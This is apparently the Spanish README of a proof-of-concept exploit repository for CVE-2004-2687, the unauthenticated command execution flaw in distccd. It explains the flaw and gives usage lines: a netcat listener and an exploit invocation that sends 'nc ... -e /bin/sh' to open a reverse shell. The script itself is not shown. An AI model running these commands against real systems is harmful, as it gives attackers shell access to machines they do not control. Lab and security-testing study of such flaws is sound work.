
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Actualizado a Python3
Resumen
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para la vulnerabilidad distccd identificada como CVE-2004-2687. La vulnerabilidad existe en el demonio distccd, que forma parte del sistema de compilación distribuida de C/C++ distcc. Cuando está mal configurado, distccd permite a atacantes remotos ejecutar comandos arbitrarios en el servidor sin autenticación alguna.
Detalles de la vulnerabilidad
distcc está diseñado para distribuir tareas de compilación entre múltiples máquinas para acelerar el proceso de compilación. Sin embargo, si el demonio distccd no está asegurado correctamente, expone una vulnerabilidad de ejecución remota de código (RCE). Esto ocurre porque el demonio escucha en un puerto de red y acepta comandos de cualquier cliente, permitiéndoles ejecutar comandos de shell en el servidor como el usuario que ejecuta el demonio.
A la vulnerabilidad se le ha asignado CVE-2004-2687 y afecta a las versiones de distccd anteriores a 3.1. Cuando se explota, un atacante puede obtener acceso a la shell de la máquina vulnerable, lo que conduce a un posible compromiso de todo el sistema.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Vulnerabilidad :

Exploit :
